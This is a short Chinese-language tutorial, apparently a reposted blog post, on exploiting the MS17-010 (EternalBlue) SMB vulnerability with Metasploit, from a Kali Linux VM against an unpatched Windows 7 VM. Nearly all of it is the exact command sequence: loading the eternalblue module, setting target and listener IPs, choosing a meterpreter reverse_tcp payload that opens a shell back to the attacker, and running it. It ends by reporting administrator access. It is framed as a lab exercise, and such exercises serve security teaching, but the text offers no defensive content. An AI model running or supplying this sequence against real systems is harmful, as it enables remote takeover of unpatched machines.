ms17-010-永恆之藍漏洞利用教程
阿新 • • 發佈:2019-01-05
實驗環境:虛擬機器:kali-linux windows 7 請自行下載安裝
1.開啟虛擬機器 啟動kali-linux 啟動windows7(未裝補丁)
2.獲取IP地址(ifconfig ipconfig)
kali-linux :192.168.0.129
windows7 : 192.168.0.130
3. kali-linux輸入msfconsole啟動msf(若不是root登陸需sudo提升許可權)
[email protected]:~# msfconsole
命令提示行顯示msf則啟動成功。
4. 使用永恆之藍漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue
5. 設定靶機 IP 和操作機 IP
192.168.18.129為操作機kali-linux ip地址
192.168.18.130為靶機windows 7 ip地址
msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130
msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.129
6. 設定TCP連線
msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
7.攻擊
msf exploit (windows/smb/ms17_010_eternalblue) > run
測試:
已成功獲得windows管理員許可權!
本教程由qianxiao996原創,如需轉載,請註明出處!謝謝。